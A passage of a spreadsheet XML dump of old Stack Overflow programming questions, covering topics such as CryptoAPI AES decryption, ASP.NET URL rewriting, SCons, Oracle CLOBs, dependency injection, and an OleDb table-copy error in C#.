&lt;pre&gt;&lt;code&gt;                                    keyBlob.hdr.bType = PLAINTEXTKEYBLOB;
				keyBlob.hdr.bVersion = CUR_BLOB_VERSION;
				keyBlob.hdr.reserved = 0;
				keyBlob.hdr.aiKeyAlg = CALG_AES_256;
				keyBlob.cbKeySize = KEY_SIZE;
				keyBlob.rgbKeyData = &amp;amp;byKey[0];
				if ( CryptImportKey( hProv, (const LPBYTE) &amp;amp;keyBlob, sizeof(BLOBHEADER) + sizeof(DWORD) + KEY_SIZE, 0, CRYPT_EXPORTABLE, &amp;amp;hKey ) )
				{
					if ( CryptSetKeyParam( hKey, KP_IV, (const BYTE *) &amp;amp;byIV, 0))
					{
						DWORD dwLen = iDestLen;
						if ( CryptDecrypt( hKey, 0, TRUE, 0, pbyData, &amp;amp;dwLen))
						{
							if ( dwLen &amp;lt; (DWORD) *plOutSize)
							{
								memcpy_s(pbyOutput, *plOutSize, pbyData, dwLen);
								*plOutSize = dwLen;
								bRet = TRUE; 
							}
						}
						else
						{
							// Log
							DWORD dwErr = ::GetLastError();
							int y =0;
						}
					}
				}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm calling CryptAcquireContext successfully and my C++ is executing fine.  Can anyone spot the error in my ways.  It's starting to depress me know :(&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any libraries/frameworks for SCons?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Each project using SCons seems to be reinventing the wheel.
I would be glad to take someones directory layout, and/or solution for variant builds(debug/release), and/or testing framework, and/or best practices.&lt;/p&gt;
&lt;p&gt;Even several not-too-simple examples would help. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to implement a stored procedure with full text search</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to run a search with MSSQL Full text engine where given the following user input:
"Hollywood square"&lt;/p&gt;
&lt;p&gt;I want the results to have both Hollywood and square[s] in them.&lt;/p&gt;
&lt;p&gt;I can create a method on the web server (C#, ASP.NET) to dynamically produce a sql statement like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT TITLE
FROM MOVIES
WHERE CONTAINS(TITLE,'"hollywood*"')
AND CONTAINS(TITLE, '"square*"')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Easy enough.  HOWEVER, I would like this in a stored procedure for added speed benefit and security for adding parameters.&lt;/p&gt;
&lt;p&gt;Can I have my cake and eat it too?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rewriting URLs in ASP.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using ASP.NET C#.&lt;/p&gt;
&lt;p&gt;How do I implement URL re-writing procedure that is similar to StackOverflow.com?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://stackoverflow.com/questions/358630/how-to-search-date-in-sql
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also, what is the meaning of values such as "358630" in the URL? Is this the question ID (the basis for which they use to fetch the data from the table)? Whatever it is, in my application I am identifying records using an "ID" field. This field is an identity column in an SQL table. Right now, my URLs are like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://myweb.com/showdetails.aspx?id=9872
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I'd like them to appear like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://myweb.com/showdetails/9872/my_question_title
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://myweb.com/9872/my_question_title
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or whatever the best way, which will taste good to search bots.&lt;/p&gt;
&lt;p&gt;My application is hosted on &lt;a href="http://en.wikipedia.org/wiki/Go_Daddy" rel="nofollow"&gt;Go Daddy&lt;/a&gt;'s shared hosting service, and I feel that no customized ASP.NET "HTTP module" or no customized DLL for URL re-writing is working on their server. I tried many samples but no luck yet!&lt;/p&gt;
&lt;p&gt;I found that Stack Overflow is hosted on Go Daddy (shared hosting?). Maybe Stack Overflow's method will work for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Page displays true after running command: 'webby'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running though the &lt;a href="http://webby.rubyforge.org/tutorial/" rel="nofollow"&gt;webby tutorial&lt;/a&gt; and I get to the part where you run the &lt;strong&gt;webby&lt;/strong&gt; command for the first time to generate the website in the /output directory.  &lt;/p&gt;
&lt;p&gt;I do that, and next I'm told to open output/index.html.   I do so, and the only thing that displays is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I view the source...and all that is displayed is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This isn't a Budweiser commercial from years past!  This is webby!&lt;/p&gt;
&lt;p&gt;I wrote down the commands I used to install webby &lt;a href="http://leeand00.tiddlyspot.com/#[[Installing%20Webby]]" rel="nofollow"&gt;here&lt;/a&gt;, but it still doesn't seem to work.&lt;/p&gt;
&lt;p&gt;According to the &lt;strong&gt;webby -v&lt;/strong&gt; command... I was doing it correctly. What did I do wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSNumberFormatter: plusSign vs. positivePrefix</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The NSNumberFormatter class has &lt;code&gt;plusSign&lt;/code&gt; and &lt;code&gt;minusSign&lt;/code&gt; properties, but also has &lt;code&gt;positivePrefix&lt;/code&gt; and &lt;code&gt;negativePrefix&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What is the difference between these two? If I specify both, which one comes first?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I test if a column equals empty_clob() in Oracle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The naÃ¯ve &lt;code&gt;FOO = empty_clob()&lt;/code&gt; complains about incompatible types. I tried Googling, but (once again) had little success searching for help with Oracle. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retrieve file properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When in Windows XP, if I open the properties window for the file and click the second tab, I will find a window where to add attributes or remove them.&lt;/p&gt;
&lt;p&gt;While developing things, I noticed there was actually something I wanted to know about the file. How to retrieve this data? It's a string with name 'DESCRIPTION'.&lt;/p&gt;
&lt;p&gt;The actual tab is saying 'Custom'. I think it's called metadata what it shows.&lt;/p&gt;
&lt;p&gt;I noticed that only the files I'm looking at have that tab. It seems to be specific only for the SLDLFP -file.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When working with domain models and POCO classes, where do queries go?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to domain models, POCO and DDD, so I am still trying to get my head around a few ideas.&lt;/p&gt;
&lt;p&gt;One of the things I could not figure out yet is how to keep my domain models simple and storage-agnostic but still capable of performing some queries over its data in a rich way.&lt;/p&gt;
&lt;p&gt;For instance, suppose that I have an entity Order that has a collection of OrdemItems. I want to get the cheapest order item, for whatever reason, or maybe a list of order items that are not currently in stock. What I don't want to do is to retrieve all order items from storage and filter later (too expensive) so I want to end up having a db query of the type "SELECT .. WHERE ITEM.INSTOCK=FALSE" somehow. I don't want to have that SQL query in my entity, or any variation of if that would tie me into a specific platform, like NHibernate queries on Linq2SQL. What is the common solution in that case?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get only class variables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this class definition:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class cols:
    name = 'name'
    size = 'size'
    date = 'date'
    @classmethod
    def foo(cls):
        print "This is a class method"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With __dict__ I get all class attributes (members and variables). Also there are the "Internal attributes" too (like __main__). How can I get only the class variables without instantiation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Theories of software engineering</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my career I've come across two broad types of theory: physical theories and educational/management theories:&lt;/p&gt;
&lt;p&gt;Physical theories are either correct (under appropriate conditions) or incorrect, as judged by the physical world.&lt;/p&gt;
&lt;p&gt;Educational/management theories have the appearance of being like physical theories, but they lack rigorous testing. At best they give new ways of thinking about problems. Multiple theories are useful because one of them may speak to you in the right way.&lt;/p&gt;
&lt;p&gt;As an hobbyist student of software engineering there appear to be a lot of theories of software engineering (such agile programming, test driven design, patterns, extreme programming). Should I consider these theories to be physical-like or educational/management-like?&lt;/p&gt;
&lt;p&gt;Or have I mis-understood software engineering and find myself being in the position of "not even wrong"?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I build a OneTwoThree linked list with a minimum number of assignment operators?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across this problem while preparing for an interview and curious to know the diffrent ways it can be written. I found this at &lt;a href="http://cslibrary.stanford.edu/103/" rel="nofollow"&gt;http://cslibrary.stanford.edu/103/&lt;/a&gt; and have given the problem as it is.&lt;/p&gt;
&lt;p&gt;here is a code to build the list {1,2,3}&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct node* BuildOneTwoThree() {
    struct node* head = NULL;
    struct node* second = NULL;
    struct node* third = NULL;
    head = malloc(sizeof(struct node)); // allocate 3 nodes in the heap
    second = malloc(sizeof(struct node));
    third = malloc(sizeof(struct node));
    head-&amp;gt;data = 1; // setup first node
    head-&amp;gt;next = second; // note: pointer assignment rule
    second-&amp;gt;data = 2; // setup second node
    second-&amp;gt;next = third;
    third-&amp;gt;data = 3; // setup third link
    third-&amp;gt;next = NULL;
    // At this point, the linked list referenced by "head"
    // matches the list in the drawing.
    return head;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Q: Write the code with the smallest number of assignments (=) which will build the
above memory structure. A: It requires 3 calls to malloc(). 3 int assignments (=) to setup
the ints. 4 pointer assignments to setup head and the 3 next fields. With a little cleverness
and knowledge of the C language, this can all be done with 7 assignment operations (=).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good free offline PL/SQL formatter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone knows a good formatter for PL/SQL free and offline?&lt;/p&gt;
&lt;p&gt;Thank you very much.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DataGridView Autogeneratecolumns as TextBox instead of label</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I have a datagridview that will autogenerate a textbox instead of a label?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Differences among the methods of loading an extension in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;extension="ext.so"
zend_extension="/usr/lib/php4/ext.so"
zend_extension_ts="/usr/lib/php4/ext.so"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What are the differences?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to quantify the quality of a pseudorandom number generator?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is based on &lt;a href="http://stackoverflow.com/questions/137783/"&gt;this question&lt;/a&gt;. A number of answers were proposed that generate non-uniform distributions and I started wondering how to quantify the non uniformity of the output. I'm not looking for patterning issues, just single value aspects.&lt;/p&gt;
&lt;p&gt;What are the accepted procedures?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;My current thinking is to computer the average &lt;a href="http://en.wikipedia.org/wiki/Information_entropy" rel="nofollow"&gt;Shannon entropy&lt;/a&gt; per call by computing the entropy of each value and taking a weighted average. This can then be compered to the expected value.&lt;/p&gt;
&lt;p&gt;My concerns are&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is this correct?&lt;/li&gt;
&lt;li&gt;How to compute these value without loosing precision?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For #1 I'm wondering if I've got it correct.&lt;/p&gt;
&lt;p&gt;For #2 the concern is that I would be processing numbers with magnitudes like 1/7 +/- 1e-18 and I'm worried that the floating point errors will kill me for any but the smallest problems. The exact form of the computation could result in some major differences here and I seem to recall that there are some ASM options for some special log cases but I can't seem to find the docs about this.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;In this case the use is take a "good" PRNG for the range &lt;code&gt;[1,n]&lt;/code&gt; and generate a SRNG for the range &lt;code&gt;[1,m]&lt;/code&gt;. The question is how much worse is the results than the input?&lt;/p&gt;
&lt;p&gt;What I have is expected occurrence rates for each output value.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checking whether all enum values are mapped?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a convenience method available in the java standard libraries to check whether all possible keys in an EnumMap are mapped to a value?&lt;/p&gt;
&lt;p&gt;I can write my own method like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static &amp;lt;T extends Enum&amp;lt;T&amp;gt;&amp;gt; boolean areAllValuesMapped(EnumMap&amp;lt;T, ?&amp;gt; map, Class&amp;lt;T&amp;gt; enumClass)
{
    return map.keySet().equals(EnumSet.allOf(enumClass));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But then I'm repeating the Class parameter (already given in the EnumMap constructor) as well as creating throwaway KeySet and EnumSet objects. EnumMap should have enough information to do this efficiently as an internal operation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I set the value of auto property backing fields in a struct constructor?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a struct like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public struct SomeStruct
{
    public SomeStruct(String stringProperty, Int32 intProperty)
    {
        this.StringProperty = stringProperty;
        this.IntProperty = intProperty;
    }
    public String StringProperty { get; set; }
    public Int32 IntProperty { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Of course, a compiler error is generated that reads &lt;strong&gt;The 'this' object cannot be used before all of its fields are assigned to&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Is there a way to assign values to the backing fields or the properties themselves, or do I have to implement properties the old-fashioned way with my own explicit backing fields?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Read rss and show as html</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using google reader for my RSS, i want to export all my shared or starred rss items to HTML to take this html and put on my website&lt;/p&gt;
&lt;p&gt;Do any one have an idea about?
And one important thing as well, can i page through this html? i mean to export as pages not all in one html page to let the user on my site page through my starred feeds.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
</t>
  </si>
  <si>
    <t>dependency injection and logging interfaces</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering what some of the best practices were around logging and logging frameworks and dependency injection. Specifically, if I am designing a class that needs a way to log, how should I go about getting an interface to log to keeping dependency injection in mind?&lt;/p&gt;
&lt;p&gt;Dependency injection seems to state that external dependencies should be injected from the outside (constructor or property setters), so should I take an ILog instance in the constructor and use in the class? Should I consider logging an optional dependency and get it in a setter? Am I pushing for too much flexibility by allowing for the logging interface to change and should I just take a hard dependency on a specific logging interface (by e.g. create a static ILog variable via a call to a factory method)? Could this factory method call into the container to get the ILog implementation or will this create initialization conflicts between static variables being initialization and the IoC container being initialized?&lt;/p&gt;
&lt;p&gt;Should I be doing this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyService : ISomeService
{
  private static readonly ILogger s_log = 
            LoggingFactory.GetLogger(typeof(MyService))
  ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or perhaps this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyService : ISomeService
{
  protected virtual ILogger Logger {get; private set;}
  public MyService(ILogger logger, [other dependencies])
  {
    Logger = logger;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or even this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyService : ISomeService
{
  public virtual ILogger Logger {get; set;}
  public MyService()
  {
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Other patterns or ways to do this? What are people out there doing? What's working and when?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to loop through a sub section of a list in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So for a list that has 1000 elements, I want to loop from 400 to 500. How do you do it?&lt;/p&gt;
&lt;p&gt;I don't see a way by using the for each and for range techniques.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UIComboBox... Where is it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm pretty sure i already know the answer to this, but does the SDK include access to the combo box control used in mobile safari?&lt;/p&gt;
&lt;p&gt;It should be easy enough to build one... but I'm not looking to re-invent the wheel if I don't have to.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.net: Does anyone know how to implement youtube search box like effect?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When the search text box on youtube have focus on it, it is sort of highlighted with blue color around the text box. I'll like to implement that kind of effect on my web app. does anyone know how that's done or something similar?&lt;/p&gt;
&lt;p&gt;Jack&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good tools for analysing COM object registry interference?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have inherited two complicated COM objects. One was derived from the other and (allegedly) the GUIDs, etc., were all changed so that they should not interfere.  They do interfere and so far our debugging has not identified the culprit -- we've done registry compares and source code diffs and looked through the SCCS checkins.  Obviously we're missing something, but they're big and complicated enough that I'm not surprised.&lt;/p&gt;
&lt;p&gt;Is there a tool which can help, perhaps by checking COM objects for good behavior or detecting clashes between two COM objects or analyzing the registry?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Google maps api database interaction</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working on a project where users need to be able to enter geological data (such as a certain street name) into a website which will be put into a database and then retrieved and displayed on a Google map for all users to see.&lt;/p&gt;
&lt;p&gt;I've done a little research and so far it looks like the best way to do this is to use a php script for getting data and sending it to a mySQL database where it can then be retrieved by another php script and then passed to javascript to display on the map.&lt;/p&gt;
&lt;p&gt;From a big picture standpoint is this the best way to do things?&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to fix: Dynamic SQL generation for the DeleteCommand is not supported against a SelectCommand that does not return any key column information</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My code works. After I copy about 10 tables I get an error. &lt;code&gt;Dynamic SQL generation for the DeleteCommand is not supported against a SelectCommand that does not return any key column information.&lt;/code&gt; Okay, I know I need to generate a primary key. But why can I copy 10 or so tables over, and THEN I get the error. Does each row have to return a primary key? If a row doesn't have a primary key, how do I generate one?&lt;/p&gt;
&lt;p&gt;Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Collections.Generic;
using System.Data;
using System.Data.OleDb;
using System.IO;
using System.Linq;
using System.Text;
namespace LCR_ShepherdStaffupdater_1._0
{
    public class DatabaseHandling
    {
        static DataTable datatableB = new DataTable();
        static DataTable datatableA = new DataTable();
        public static DataSet datasetA = new DataSet();
        public static DataSet datasetB = new DataSet();
        static OleDbDataAdapter adapterA = new OleDbDataAdapter();
        static OleDbDataAdapter adapterB = new OleDbDataAdapter();
        static string connectionstringA = "Provider=Microsoft.Jet.OLEDB.4.0;" + "Data Source=" + Settings.getfilelocationA();
        static string connectionstringB = "Provider=Microsoft.Jet.OLEDB.4.0;" + "Data Source=" + Settings.getfilelocationB();
        static OleDbConnection dataconnectionB = new OleDbConnection(connectionstringB);
        static OleDbConnection dataconnectionA = new OleDbConnection(connectionstringA);
        static DataTable tableListA;
        static DataTable tableListB;
        static public void addTableA(string table, bool addtoDataSet)
        {
            dataconnectionA.Open();
            datatableA = new DataTable(table);
            try
            {
                OleDbCommand commandselectA = new OleDbCommand("SELECT * FROM [" + table + "]", dataconnectionA);
                adapterA.SelectCommand = commandselectA;
                adapterA.Fill(datatableA);
            }
            catch
            {
                Logging.updateLog("Error: Tried to get " + table + " from DataSetA. Table doesn't exist!", true, false, false);
            }
            if (addtoDataSet == true)
            {
                datasetA.Tables.Add(datatableA);
                Logging.updateLog("Added DataTableA: " + datatableA.TableName.ToString() + " Successfully!", false, false, false);
            }
            dataconnectionA.Close();
        }
        static public void addTableB(string table, bool addtoDataSet)
        {
            dataconnectionB.Open();
            datatableB = new DataTable(table);
            try
            {
                OleDbCommand commandselectB = new OleDbCommand("SELECT * FROM [" + table + "]", dataconnectionB);
                adapterB.SelectCommand = commandselectB;
                adapterB.Fill(datatableB);
            }
            catch
            {
                Logging.updateLog("Error: Tried to get " + table + " from DataSetB. Table doesn't exist!", true, false, false);
            }
            if (addtoDataSet == true)
            {
                datasetB.Tables.Add(datatableB);
                Logging.updateLog("Added DataTableB: " + datatableB.TableName.ToString() + " Successfully!", false, false, false);
            }
            dataconnectionB.Close();
        }
        static public string[] getTablesA(string connectionString)
        {
            dataconnectionA.Open();
            tableListA = dataconnectionA.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "TABLE" });
            string[] stringTableListA = new string[tableListA.Rows.Count];
            for (int i = 0; i &amp;lt; tableListA.Rows.Count; i++)
            {
                stringTableListA[i] = tableListA.Rows[i].ItemArray[2].ToString();
            }
            dataconnectionA.Close();
            return stringTableListA;
        }
        static public string[] getTablesB(string connectionString)
        {
            dataconnectionB.Open();
            tableListB = dataconnectionB.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "TABLE" });
            string[] stringTableListB = new string[tableListB.Rows.Count];
            for (int i = 0; i &amp;lt; tableListB.Rows.Count; i++)
            {
                stringTableListB[i] = tableListB.Rows[i].ItemArray[2].ToString();
            }
            dataconnectionB.Close();
            return stringTableListB;
        }
        static public void createDataSet()
        {
            string[] tempA = getTablesA(connectionstringA);
            string[] tempB = getTablesB(connectionstringB);
            int percentage = 0;
            int maximum = (tempA.Length + tempB.Length);
            Logging.updateNotice("Loading Tables...");
            Logging.updateLog("Started Loading File A", false, false, true);
            for (int i = 0; i &amp;lt; tempA.Length ; i++)
            {
                if (!datasetA.Tables.Contains(tempA[i]))
                {
                    addTableA(tempA[i], true);
                    percentage++;
                    Logging.loadStatus(percentage, maximum);
                }
                else
                {
                    datasetA.Tables.Remove(tempA[i]);
                    addTableA(tempA[i], true);
                    percentage++;
                    Logging.loadStatus(percentage, maximum);
                }
            }
            Logging.updateLog("Finished loading File A", false, false, true);
            Logging.updateLog("Started loading File B", false, false, true);
            for (int i = 0; i &amp;lt; tempB.Length ; i++)
            {
                if (!datasetB.Tables.Contains(tempB[i]))
                {
                    addTableB(tempB[i], true);
                    percentage++;
                    Logging.loadStatus(percentage, maximum);
                }
                else
                {
                    datasetB.Tables.Remove(tempB[i]);
                    addTableB(tempB[i], true);
                    percentage++;
                    Logging.loadStatus(percentage, maximum);
                }
            }
            Logging.updateLog("Finished loading File B", false, false, true);
            Logging.updateLog("Both files loaded into memory successfully", false, true, false);
        }
        static public DataTable getDataTableA()
        {
            datatableA = datasetA.Tables[Settings.textA];
            return datatableA;
        }
        static public DataTable getDataTableB()
        {
            datatableB = datasetB.Tables[Settings.textB];
            return datatableB;
        }
        static public DataSet getDataSetA()
        {
            return datasetA;
        }
        static public DataSet getDataSetB()
        {
            return datasetB;
        }
        static public void InitiateCopyProcessA()
        {
            DataSet tablesA;
            tablesA = DatabaseHandling.getDataSetA();
            int percentage = 0;
            int maximum = (tablesA.Tables.Count);
                foreach (DataTable table in tablesA.Tables)
                {
                    Logging.loadStatus(percentage, maximum);
                    OverwriteTable(table, table.TableName);
                    Logging.updateLog("Copied " + table.TableName + " successfully.", false, true, false);
                    percentage++;
                }
        }
        static void OverwriteTable(DataTable sourceTable, string tableName)
        {
            using (var destConn = new OleDbConnection(connectionstringA))
            using (var destCmd = new OleDbCommand(tableName, destConn) { CommandType = CommandType.TableDirect })
            using (var destDA = new OleDbDataAdapter(destCmd))
            {
                // Since we're using a single table, we can have the CommandBuilder
                // generate the appropriate INSERT and DELETE SQL statements
                using (var destCmdB = new OleDbCommandBuilder(destDA))
                {
                    destCmdB.QuotePrefix = "["; // quote reserved column names
                    destCmdB.QuoteSuffix = "]";
                    destDA.DeleteCommand = destCmdB.GetDeleteCommand();
                    destDA.InsertCommand = destCmdB.GetInsertCommand();
                    // Get rows from destination, and delete them
                    var destTable = new DataTable();
                    destDA.Fill(destTable);
                    foreach (DataRow dr in destTable.Rows)
                    {
                        dr.Delete();
                    }
                     destDA.Update(destTable);
                    // Set rows from source as Added, so the DataAdapter will insert them
                    foreach (DataRow dr in sourceTable.Rows)
                    {
                        dr.SetAdded();
                    }
                    destDA.Update(sourceTable);
                }
            }
        }
        }          
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Google was not very helpful to me on this. Please provide a coding example.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing a method as a parameter in Ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to mess around a little bit with Ruby. Therefor I try to implement the algorithms (given in Python) from the book "Programming Collective Intelligence" Ruby.&lt;/p&gt;
&lt;p&gt;In chapter 8 the author passes a method a as parameter. This seems to work in Python but not in Ruby.&lt;/p&gt;
&lt;p&gt;I have here the method&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def gaussian(dist, sigma=10.0)
  foo
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and want to call this with another method&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def weightedknn(data, vec1, k = 5, weightf = gaussian)
  foo
  weight = weightf(dist)
  foo
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All I got is an error&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ArgumentError: wrong number of arguments (0 for 1)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I strip Python logging calls without commenting them out?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Today I was thinking about a Python project I wrote about a year back where I used &lt;code&gt;logging&lt;/code&gt; pretty extensively. I remember having to comment out a lot of logging calls in inner-loop-like scenarios (the 90% code) because of the overhead (&lt;code&gt;hotshot&lt;/code&gt; indicated it was one of my biggest bottlenecks).&lt;/p&gt;
&lt;p&gt;I wonder now if there's some canonical way to programmatically strip out logging calls in Python applications without commenting and uncommenting all the time. I'd think you could use inspection/recompilation or bytecode manipulation to do something like this and &lt;strong&gt;target only the code objects that are causing bottlenecks&lt;/strong&gt;. This way, you could add a manipulator as a post-compilation step and use a centralized configuration file, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Leave ERROR and above]
my_module.SomeClass.method_with_lots_of_warn_calls
[Leave WARN and above]
my_module.SomeOtherClass.method_with_lots_of_info_calls
[Leave INFO and above]
my_module.SomeWeirdClass.method_with_lots_of_debug_calls
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Of course, &lt;strong&gt;you'd want to use it sparingly and probably with per-function granularity&lt;/strong&gt; -- only for code objects that have shown &lt;code&gt;logging&lt;/code&gt; to be a bottleneck. Anybody know of anything like this?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; There are a few things that make this more difficult to do in a performant manner because of dynamic typing and late binding. For example, any calls to a method named &lt;code&gt;debug&lt;/code&gt; may have to be wrapped with an &lt;code&gt;if not isinstance(log, Logger)&lt;/code&gt;. In any case, I'm assuming all of the minor details can be overcome, either by a gentleman's agreement or some run-time checking. :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Android TextView Timer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For my Android application there is a timer that measures how much time has passed. Ever 100 milliseconds I update my TextView with some text like "Score: 10 Time: 100.10 seconds". But, I find the TextView only updates the first few times. The application is still very responsive, but the label will not update. I tried to call .invalidate(), but it still does not work. I don't know if there is some way to fix this, or a better widget to use.&lt;/p&gt;
&lt;p&gt;Here is a example of my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;float seconds;
java.util.Timer gametimer;
void updatecount() { TextView t = (TextView)findViewById(R.id.topscore);
t.setText("Score: 10 - Time: "+seconds+" seconds");
t.postInvalidate();
}
public void onCreate(Bundle sis) {
... Load the UI, etc...
  gametimer.schedule(new TimerTask() { public void run() {
     seconds+=0.1; updatecount();
} }, 100, 100);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you specify a tab in .screenrc?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;According to &lt;a href="http://www.mattcutts.com/blog/screen-power-tips-screenrc/" rel="nofollow"&gt;this website&lt;/a&gt;, you can change to command key sequence used by the Unix "screen" utility like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;escape ^Bb # Instead of Control-a, make the 
           # escape/command character be 
           # Control-b
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would you make it Control-Tab, I wonder?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# regular expressions - matching whole words?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a program that needs to search a LARGE text document for a large collection of words.  The words are all file names, with underscores in them (eg, this_file_name).  I know how to open and iterate through a text document, but I'm curious whether I should use Regex to search for these names, and if so, what kind of reg. ex. sequence should I use?   I've tried &lt;/p&gt;
&lt;pre&gt;
Regex r = new Regex("?this\_file\_name");
&lt;/pre&gt;
&lt;p&gt;but I get an invalid argument error every time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Star Programmers [Team] vs Overall team quality</t>
  </si>
  <si>
